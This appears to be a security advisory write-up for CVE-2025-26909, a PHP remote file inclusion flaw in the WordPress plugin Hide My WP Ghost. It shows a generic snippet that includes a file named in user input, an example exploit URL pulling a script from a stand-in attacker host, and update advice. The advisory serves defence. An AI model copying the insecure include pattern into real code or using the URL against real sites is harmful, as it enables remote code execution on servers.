CVE-2025-26909 - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') Vulnerability in John Darrel Hide My WP Ghost

A new vulnerability was recently discovered in the popular WordPress plugin, John Darrel Hide My WP Ghost. This plugin, used by thousands of websites, allows users to alter the structure of their webpages and make it challenging for hackers to find and exploit WordPress sites.

The vulnerability, assigned as CVE-2025-26909, has been classified as 'PHP Remote File Inclusion'. This type of vulnerability is dangerous because it allows attackers to include a local or remote file in a vulnerable PHP application, thereby gaining unauthorized access to the website. It's crucial for website administrators to be aware of this vulnerability and take immediate action to update their Hide My WP Ghost plugin to a more secure version to avoid potential breaches.

Affected Versions:
- Hide My WP Ghost: n/a - 5.4.01

Exploit Details

The issue arises due to improper control of the filename for the "include" and "require" statements in the PHP program. An attacker can exploit this vulnerability by crafting a malicious file with PHP code and uploading it to a location from where it can be included when parsing the affected PHP script. Once the malicious file is included, the attacker can execute arbitrary PHP code on the hosting server, potentially leading to unauthorized access and damage to the application.

Below is a snippet of vulnerable code

if (isset($_GET['file'])) {
  $file = $_GET['file'];
} else {
  $file = 'default.php';
}

include($file);

In this example, the filename used in the "include" statement is taken directly from the user's input, which is susceptible to file inclusion vulnerabilities. By modifying the 'file' parameter in an HTTP GET request, an attacker can include a malicious PHP file hosted on a different server or already uploaded to the target server.

To exploit this vulnerability, an attacker can craft a URL like this

https://vulnerablewebsite.com/vulnerablepage.php?file=https://attackerwebsite.com/maliciousfile.php

Upon visiting such a URL, the malicious PHP file hosted on the attacker's website will be included and executed on the vulnerable website, allowing the attacker to leverage the hosting server's resources and gain unauthorized access to the application.

Official References

This vulnerability has been identified by several sources and is officially documented on the following websites:

- CVE Database
- National Vulnerability Database (NVD)

Mitigations

If you use the Hide My WP Ghost plugin, it's essential to update it to the latest version immediately. The plugin author has released a security patch for the affected versions, and installing it will help protect your website from being exploited by attackers.

Keep all your WordPress plugins up-to-date and regularly monitor security announcements from plugin authors, as well as official sources like the CVE Database and the National Vulnerability Database.

Conclusion

The discovery of the CVE-2025-26909 vulnerability in the John Darrel Hide My WP Ghost plugin is a clear reminder of the importance of staying informed about software vulnerabilities and maintaining an up-to-date security posture for your WordPress site. Update your Hide My WP Ghost plugin immediately if you're using an affected version, and continue to monitor all of your plugins for the latest security updates.

Timeline

Published on: 03/27/2025 16:15:30 UTC
Last modified on: 03/27/2025 16:45:12 UTC